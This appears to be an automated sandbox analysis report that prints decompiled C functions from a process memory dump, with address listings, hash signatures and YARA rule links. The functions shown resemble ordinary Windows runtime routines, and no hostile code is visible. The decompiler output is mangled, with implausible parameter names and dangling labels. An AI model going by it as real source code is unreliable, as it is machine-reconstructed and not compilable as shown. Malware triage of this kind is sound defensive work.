                            0x00000000
                            0x013652ba
                            0x013652bc
                            0x013652bc
                            0x013652d4
                            0x013652d9
                            0x013652dc
                            0x013652e1
                            0x00000000
                            0x00000000
                            0x013652e7
                            0x013652f4
                            0x00000000
                            0x013652f4
                            0x01365270
                            0x00000000
                            0x01365270
                            0x013651fc
                            0x013651fd
                            0x01365202
                            0x01365203
                            0x01365205
                            0x0136520a
                            0x0136520f
                            0x00000000
                            0x00000000
                            0x0136521b
                            0x01365226
                            0x0136522b
                            0x0136521d
                            0x0136521d
                            0x01365222
                            0x01365222
                            0x0136522d
                            0x00000000

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: Legacy$UEFI
                            • API String ID: 2994545307-634100481
                            • Opcode ID: c40cf1454229e7a6edf3a602102d4984441c3ade941e2d2308bbca3aff8c8256
                            • Instruction ID: 4f671659d7b4500851b5a976e9efe3827b525c749671c0fde5cc388328227930
                            • Opcode Fuzzy Hash: c40cf1454229e7a6edf3a602102d4984441c3ade941e2d2308bbca3aff8c8256
                            • Instruction Fuzzy Hash: 0C516F71E006199FDB15DFA8C840BAEBBFCFF44B48F24802DE649EB255D6719900CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 012EB171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                            Download Yara Rule
                            C-Code - Quality: 78%
                            			E012EB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x13bf7a8);
				E0133D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0133D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0132D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0132F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0133DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0132B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0132B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0132E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0132A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                            0x012eb171
                            0x012eb171
                            0x012eb171
                            0x012eb171
                            0x012eb171
                            0x012eb176
                            0x012eb17b
                            0x012eb180
                            0x012eb186
                            0x012eb18f
                            0x012eb198
                            0x012eb1a4
                            0x012eb1aa
                            0x01344802
                            0x01344802
                            0x01344805
                            0x0134480c
                            0x0134480e
                            0x012eb1d1
                            0x012eb1d3
                            0x012eb1de
                            0x012eb1de
                            0x01344817
                            0x0134481e
                            0x01344820
                            0x01344822
                            0x01344822
                            0x01344824
                            0x01344824
                            0x0134482a
                            0x00000000
                            0x00000000
                            0x01344835
                            0x0134483a
                            0x0134483d
                            0x0134483f
                            0x01344842
                            0x01344842
                            0x01344842
                            0x01344846
                            0x0134484c
                            0x0134484e
                            0x01344851
                            0x01344851
                            0x01344853
                            0x01344854
                            0x01344854
                            0x01344858
                            0x0134485a
                            0x0134485a
                            0x0134485d
                            0x0134485f
                            0x01344861
                            0x01344861
                            0x01344866
                            0x0134486b
                            0x0134486e
                            0x01344871
                            0x01344876
                            0x01344876
                            0x01344878
                            0x0134487b
                            0x01344884
                            0x01344884
                            0x00000000
                            0x0134487d
                            0x0134487d
                            0x01344882
                            0x01344889
                            0x01344889
                            0x0134488f
                            0x01344891
                            0x013448e0
                            0x013448e2
                            0x013448e4
                            0x013448e4
                            0x013448e7
                            0x013448e7
                            0x013448ed
                            0x013448f4
                            0x013448f6
                            0x01344951
                            0x01344951
                            0x01344953
                            0x01344953
                            0x01344956
                            0x01344956
                            0x01344958
                            0x01344959
                            0x01344959
                            0x0134495d
                            0x0134495d
                            0x0134495f
                            0x0134495f
                            0x01344965
                            0x01344969
                            0x013449ba
                            0x013449ba
                            0x013449c1
                            0x013449c5
                            0x013449cc
                            0x013449d4
                            0x013449d7
                            0x013449da
                            0x013449e4
                            0x013449e5
                            0x013449f3
                            0x01344a02
                            0x00000000
                            0x01344a02
                            0x01344972
                            0x01344974
                            0x00000000
                            0x00000000
                            0x01344976
                            0x01344979
                            0x01344982
                            0x01344983
                            0x01344984
                            0x0134498b
                            0x0134498d
                            0x01344991
                            0x01344993
                            0x01344999
                            0x0134499d
                            0x013449a2
                            0x013449a2
                            0x013449a2
                            0x01344999
                            0x013449ac
                            0x00000000
                            0x013449b3
                            0x013448f8
                            0x013448fe
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013448fe
                            0x01344895
                            0x0134489c
                            0x013448ad
                            0x013448b2
                            0x013448b5
                            0x013448b7
                            0x013448ba
                            0x013448bc
                            0x013448c6
                            0x013448c6
                            0x013448cb
                            0x013448d1
                            0x013448d4
                            0x013448d8
                            0x013448d8
                            0x00000000
                            0x013448d8
                            0x013448be
                            0x013448c0
                            0x00000000
                            0x00000000
                            0x013448c2
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013448c4
                            0x00000000
                            0x01344882
                            0x0134487b
                            0x01344904
                            0x01344906
                            0x00000000
                            0x00000000
                            0x01344908
                            0x0134490e
                            0x00000000
                            0x00000000
                            0x01344910
                            0x01344917
                            0x01344917
                            0x00000000
                            0x01344917
                            0x012eb1ba
                            0x013447f9
                            0x013447fc
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013447fc
                            0x012eb1c0
                            0x012eb1c0
                            0x012eb1c3
                            0x012eb1cb
                            0x00000000
                            0x00000000
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID: _vswprintf_s
                            • String ID:
                            • API String ID: 677850445-0
                            • Opcode ID: 2d8d2d28c0a0e5c664ef36d13198c1373114e57195b7c8f5a7ee3de147aad735
                            • Instruction ID: dbee48c04ec744d61646572c1d48aa9f4e4550489777b826f1dc9adf826b8a52
                            • Opcode Fuzzy Hash: 2d8d2d28c0a0e5c664ef36d13198c1373114e57195b7c8f5a7ee3de147aad735
                            • Instruction Fuzzy Hash: 8151E075D0026A8BEB31CF68C845BAEBFF0BF00718F2041B9D859AB282D7716941DB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0130B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                            Download Yara Rule
                            C-Code - Quality: 76%
                            			E0130B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x13dd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01307D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E013B8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01329E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0132B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0132CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01307D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E013B8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0132AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x13d8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x13d862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x13d8628; // 0x0
							_t116 =  *0x13d862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                            0x0130b94c
                            0x0130b956
                            0x0130b95c
                            0x0130b95e
                            0x0130b964
                            0x0130b969
                            0x0130b96d
                            0x0130b96d
                            0x0130b970
                            0x0130b974
                            0x0130b97a
                            0x0130badf
                            0x0130badf
                            0x0130bae2
                            0x0130bae4
                            0x0130bae6
                            0x0130baf0
                            0x01352cb8
                            0x0130baf6
                            0x0130baf6
                            0x0130baf6
                            0x0130bafd
                            0x0130bb1f
                            0x0130bb1f
                            0x0130baff
                            0x0130bb00
                            0x0130bb00
                            0x0130bb03
                            0x0130bb03
                            0x0130bacb
                            0x0130bacf
                            0x0130bad0
                            0x0130bad1
                            0x0130badc
                            0x0130badc
                            0x0130b980
                            0x0130b980
                            0x0130b988
                            0x0130b98b
                            0x0130b98d
                            0x0130b990
                            0x0130b993
                            0x0130b999
                            0x0130b99b
                            0x0130b9a1
                            0x0130b9a5
                            0x0130b9aa
                            0x0130b9b0
                            0x0130b9bb
                            0x0130b9c0
                            0x0130b9c3
                            0x0130b9ca
                            0x0130b9cc
                            0x0130b9cf
                            0x0130b9d3
                            0x0130b9d7
                            0x0130ba94
                            0x0130ba94
                            0x0130ba98
                            0x0130baa3
                            0x01352ccb
                            0x0130baa9
                            0x0130baa9
                            0x0130baa9
                            0x0130bab1
                            0x01352cd5
                            0x01352cdd
                            0x01352cdd
                            0x0130babb
                            0x0130babc
                            0x0130bac2
                            0x0130bac3
                            0x0130bac3
                            0x0130bac6
                            0x00000000
                            0x0130b9dd
                            0x0130b9dd
                            0x0130b9e7
                            0x0130b9e7
                            0x0130b9ec
                            0x0130b9ec
                            0x0130b9f1
                            0x0130b9f5
                            0x0130b9fa
                            0x0130ba00
                            0x0130ba0c
                            0x0130ba10
                            0x0130ba10
                            0x0130ba12
                            0x0130ba18
                            0x00000000
                            0x00000000
                            0x0130bb26
                            0x0130bb26
                            0x0130ba1e
                            0x0130ba1e
                            0x0130ba23
                            0x0130ba25
                            0x0130ba2c
                            0x0130ba30
                            0x0130ba35
                            0x0130ba35
                            0x0130ba41
                            0x0130ba46
                            0x0130ba4c
                            0x0130ba50
                            0x0130ba54
                            0x0130ba6a
                            0x0130ba6e
                            0x0130ba70
                            0x0130ba74
                            0x0130ba78
                            0x0130ba7a
                            0x0130ba7c
                            0x0130ba8e
                            0x0130ba90
                            0x0130ba92
                            0x0130bb14
                            0x0130bb14
                            0x0130bb16
                            0x0130bb16
                            0x00000000
                            0x0130ba7c
                            0x0130bb0a
                            0x0130bb0d
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0130bb0f

                            APIs
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0130B9A5
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID:
                            • API String ID: 885266447-0
                            • Opcode ID: ae4e49f2bd1ea4ade9b1ff1f714096d79ff775076e5de16ac8bf4da8bc86afb4
                            • Instruction ID: 3871854608767c04f2a660750fc53df72db5e0c6a12cb77f1eda825b1ce007cd
                            • Opcode Fuzzy Hash: ae4e49f2bd1ea4ade9b1ff1f714096d79ff775076e5de16ac8bf4da8bc86afb4
                            • Instruction Fuzzy Hash: E2516B75608341CFD722DF6DC090A2AFBE9FB88718F14496EE69587789D730E844CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01312581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 84%
                            			E01312581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1546912045) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t233;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t243;
				signed int _t245;
				intOrPtr _t247;
				signed int _t250;
				signed int _t257;
				signed int _t260;
				signed int _t268;
				intOrPtr _t274;
				signed int _t276;
				signed int _t278;
				void* _t279;
				signed int _t280;
				unsigned int _t283;
				signed int _t287;
				signed int* _t288;
				signed int _t289;
				signed int _t293;
				intOrPtr _t305;
				signed int _t314;
				signed int _t316;
				signed int _t317;
				signed int _t321;
				signed int _t322;
				void* _t324;
				signed int _t325;
				signed int _t327;
				signed int _t330;
				void* _t331;

				_t327 = _t330;
				_t331 = _t330 - 0x4c;
				_v8 =  *0x13dd360 ^ _t327;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t321 = 0x13db2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t283 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t274 = 0x48;
				_t303 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t314 = 0;
				_v37 = _t303;
				if(_v48 <= 0) {
					L16:
					_t45 = _t274 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t322 = 0xc0000106;
						goto L32;
					} else {
						_t321 = L01304620(_t283,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t274);
						_v52 = _t321;
						__eflags = _t321;
						if(_t321 == 0) {
							_t322 = 0xc0000017;
							goto L32;
						} else {
							 *(_t321 + 0x44) =  *(_t321 + 0x44) & 0x00000000;
							_t50 = _t321 + 0x48; // 0x48
							_t316 = _t50;
							_t303 = _v32;
							 *((intOrPtr*)(_t321 + 0x3c)) = _t274;
							_t276 = 0;
							 *((short*)(_t321 + 0x30)) = _v48;
							__eflags = _t303;
							if(_t303 != 0) {
								 *(_t321 + 0x18) = _t316;
								__eflags = _t303 - 0x13d8478;
								 *_t321 = ((0 | _t303 == 0x013d8478) - 0x00000001 & 0xfffffffb) + 7;
								E0132F3E0(_t316,  *((intOrPtr*)(_t303 + 4)),  *_t303 & 0x0000ffff);
								_t303 = _v32;
								_t331 = _t331 + 0xc;
								_t276 = 1;
								__eflags = _a8;
								_t316 = _t316 + (( *_t303 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t268 = E013739F2(_t316);
									_t303 = _v32;
									_t316 = _t268;
								}
							}
							_t287 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t322 = _v68;
								__eflags = 0;
								 *((short*)(_t316 - 2)) = 0;
								goto L32;
							} else {
								_t278 = _t321 + _t276 * 4;
								_v56 = _t278;
								do {
									__eflags = _t303;
									if(_t303 != 0) {
										_t233 =  *(_v60 + _t287 * 4);
										__eflags = _t233;
										if(_t233 == 0) {
											goto L30;
										} else {
											__eflags = _t233 == 5;
											if(_t233 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t278 =  *(_v60 + _t287 * 4);
										 *(_t278 + 0x18) = _t316;
										_t237 =  *(_v60 + _t287 * 4);
										__eflags = _t237 - 8;
										if(_t237 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t237 * 4 +  &M01312959))) {
												case 0:
													__ax =  *0x13d8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0132F3E0(__edi,  *0x13d848c, __ax & 0x0000ffff);
														__eax =  *0x13d8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0132F3E0(_t316, _v80, _v64);
													_t263 = _v64;
													goto L26;
												case 2:
													 *0x13d8480 & 0x0000ffff = E0132F3E0(__edi,  *0x13d8484,  *0x13d8480 & 0x0000ffff);
													__eax =  *0x13d8480 & 0x0000ffff;
													__eax = ( *0x13d8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0132F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0132F3E0(_t316, _v76, _v36);
														_t263 = _v36;
													}
													L26:
													_t331 = _t331 + 0xc;
													_t316 = _t316 + (_t263 >> 1) * 2 + 2;
													__eflags = _t316;
													L27:
													_push(0x3b);
													_pop(_t265);
													 *((short*)(_t316 - 2)) = _t265;
													goto L28;
												case 6:
													__ebx =  *0x13d575c;
													__eflags = __ebx - 0x13d575c;
													if(__ebx != 0x13d575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0132F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x13d575c;
														} while (__ebx != 0x13d575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x13d8478 & 0x0000ffff = E0132F3E0(__edi,  *0x13d847c,  *0x13d8478 & 0x0000ffff);
													__eax =  *0x13d8478 & 0x0000ffff;
													__eax = ( *0x13d8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E013739F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x13d6e58 & 0x0000ffff = E0132F3E0(__edi,  *0x13d6e5c,  *0x13d6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x13d6e58 & 0x0000ffff;
													__eax = ( *0x13d6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t287 = _v16;
													_t303 = _v32;
													L29:
													_t278 = _t278 + 4;
													__eflags = _t278;
													_v56 = _t278;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t287 = _t287 + 1;
									_v16 = _t287;
									__eflags = _t287 - _v48;
								} while (_t287 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t237 =  *(_v60 + _t314 * 4);
						if(_t237 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t237 * 4 +  &M01312935))) {
							case 0:
								__ax =  *0x13d8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t303 =  &_v64;
								_v80 = E01312E3E(0,  &_v64);
								_t274 = _t274 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x13d8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x13d8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E012FEEF0(0x13d79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E012FEB70(__ecx, 0x13d79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t211 = _v72;
											__eflags = _t211;
											if(_t211 != 0) {
												L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t211);
											}
											_t212 = _v52;
											__eflags = _t212;
											if(_t212 != 0) {
												__eflags = _t322;
												if(_t322 < 0) {
													L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t212);
													_t212 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
